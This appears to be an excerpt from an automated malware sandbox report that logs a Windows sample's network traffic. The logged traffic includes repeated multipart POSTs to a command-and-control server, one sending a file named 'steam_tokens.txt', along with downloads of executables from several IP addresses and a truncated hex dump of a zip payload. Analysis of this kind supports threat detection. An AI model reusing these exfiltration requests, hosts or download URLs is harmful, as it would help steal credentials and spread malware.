Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKJEBAAECBGDHIECAKJKHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCAAEGDBKJJKECBKFHCHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDHDHIECGCAEBFIIDHIHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGDBFBGIDHCAAKEBAKFIHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBFCGIIIJDBGCBGIDGIHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIEBAKEHDHCAKEBFBKEGHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCGIJDBAFCBAAKECGDGCHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHJJECBKKECFIEBGCAKHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAFHIDGIJKJKECBGDBGHHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFBKFHIDHIIJJKECGHCFHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJECBAAAFHIIEBFCBKFHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKEHIEBKJKFIEBGDGDAAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBGCBGCAFIIECBFIDHIJHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBGCBKFBGIIIECAAAKFCHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFBFBAEBKJKEBGCAEHCHost: 185.172.128.76Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 46 42 46 42 41 45 42 4b 4a 4b 45 42 47 43 41 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 35 63 37 38 64 66 32 33 34 39 31 65 65 31 33 63 34 38 35 34 37 37 33 39 38 38 61 66 38 38 63 37 63 64 33 38 36 38 66 39 35 65 62 34 32 65 62 38 64 62 65 37 38 63 64 61 61 65 31 65 65 30 31 66 38 39 31 38 35 61 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 42 46 42 41 45 42 4b 4a 4b 45 42 47 43 41 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 42 46 42 41 45 42 4b 4a 4b 45 42 47 43 41 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 42 46 42 41 45 42 4b 4a 4b 45 42 47 43 41 45 48 43 2d 2d 0d 0a Data Ascii: ------HCFBFBAEBKJKEBGCAEHCContent-Disposition: form-data; name="token"005c78df23491ee13c4854773988af88c7cd3868f95eb42eb8dbe78cdaae1ee01f89185a------HCFBFBAEBKJKEBGCAEHCContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------HCFBFBAEBKJKEBGCAEHCContent-Disposition: form-data; name="file"------HCFBFBAEBKJKEBGCAEHC--
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBFBGCGIJKJJKFIDBFCHost: 185.172.128.76Content-Length: 118931Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKEBFCFIJJKKECAKJEHHost: 185.172.128.76Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 4b 45 42 46 43 46 49 4a 4a 4b 4b 45 43 41 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 35 63 37 38 64 66 32 33 34 39 31 65 65 31 33 63 34 38 35 34 37 37 33 39 38 38 61 66 38 38 63 37 63 64 33 38 36 38 66 39 35 65 62 34 32 65 62 38 64 62 65 37 38 63 64 61 61 65 31 65 65 30 31 66 38 39 31 38 35 61 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 45 42 46 43 46 49 4a 4a 4b 4b 45 43 41 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 68 65 72 37 68 34 38 72 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 45 42 46 43 46 49 4a 4a 4b 4b 45 43 41 4b 4a 45 48 2d 2d 0d 0a Data Ascii: ------CAKEBFCFIJJKKECAKJEHContent-Disposition: form-data; name="token"005c78df23491ee13c4854773988af88c7cd3868f95eb42eb8dbe78cdaae1ee01f89185a------CAKEBFCFIJJKKECAKJEHContent-Disposition: form-data; name="message"her7h48r------CAKEBFCFIJJKKECAKJEH--
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /tiktok.exe HTTP/1.1Host: 185.172.128.203Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.172.128.90 185.172.128.90
Source: Joe Sandbox View IP Address: 185.172.128.228 185.172.128.228
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: NADYMSS-ASRU NADYMSS-ASRU
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /cpa/ping.php?substr=eight&s=ab&sub=0 HTTP/1.1Host: 185.172.128.90User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic HTTP traffic detected: GET /ping.php?substr=eight HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic HTTP traffic detected: GET /syncUpd.exe HTTP/1.1Host: 185.172.128.59User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic HTTP traffic detected: GET /1/Package.zip HTTP/1.1Host: note.padd.cn.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic HTTP traffic detected: GET /BroomSetup.exe HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic HTTP traffic detected: POST /__svc/sbv/DownloadManager.ashx HTTP/1.0Connection: keep-aliveContent-Length: 300Host: svc.iolo.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: identityUser-Agent: Mozilla/3.0 (compatible; Indy Library)
Source: global traffic HTTP traffic detected: POST /__svc/sbv/DownloadManager.ashx HTTP/1.0Connection: keep-aliveContent-Length: 300Host: svc.iolo.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: identityUser-Agent: Mozilla/3.0 (compatible; Indy Library)
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.90
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.90
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.90
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.90
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.90
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.228
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.228
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.228
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.228
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_0042676C __EH_prolog,WSAStartup,socket,WSACleanup,gethostbyname,htons,connect,send,send,recv,recv,recv,recv,recv,WSACleanup,closesocket, 0_2_0042676C
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 26 Apr 2024 22:30:44 GMTContent-Type: application/zipContent-Length: 3884863Last-Modified: Wed, 24 Apr 2024 05:45:46 GMTConnection: keep-aliveETag: "66289c8a-3b473f"Strict-Transport-Security: max-age=31536000Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 0b 3f 98 58 ef da 8c 80 dd c7 12 00 09 49 14 00 09 00 00 00 62 75 6e 63 68 2e 64 61 74 5c 5d 87 a2 aa 3a 16 cd af 89 8a 20 22 2a 16 10 05 54 ec 15 1b fa f7 b3 d6 4e 3c 77 66 bc ef 58 20 24 3b bb 65 b7 e4 29 a5 ac 9e af 7c 75 5d 2b bc a6 ca 55 2a 56 ea a9 7e af 81 db 9b bd d4 66 da 52 6a 65 f7 f5 b5 1d fe 1a b5 40 f5 66 f8 72 c0 df 56 0d 95 da 17 4a 2d f0 23 55 bd e7 b3 b7 bc 2a b5 de ab 3d ba 54 13 f5 45 13 35 cc 94 5a fa e3 83 aa 26 b5 9e 7a cf 95 fa f4 27 18 6b a2 8e 25 9e cb 4a 65 a9 cb 85 03 dc d4 5b 35 1e e8 cd c6 8f f7 50 c5 db 85 42 7f b5 19 40 05 ac f3 07 2e bf d4 e9 96 a8 47 eb fc 7a 5b 2a 8f 2d 42 31 e2 c3 ce d0 4a 7a 23 0c a9 ce d7 25 de bb 4a b1 fb a6 6a 06 0f d5 57 f5 a4 0e 18 af b5 00 1d 3e 36 32 eb 6a 4b 28 95 bc 0d d4 f1 a3 1a a1 9a c4 a5 02 84 45 b4 54 c9 51 7d d6 6a dd 5f 49 8b 8e 52 ee 54 45 6a a3 3e d2 f1 8b 4f c6 2a 99 3a 4a 25 6f a5 da aa 18 02 8b ec aa a6 b2 60 82 66 2b 4f a9 d6 1c 57 3e 15 87 c0 a3 dd 53 8e 49 4e 43 f5 6d ab 36 be a9 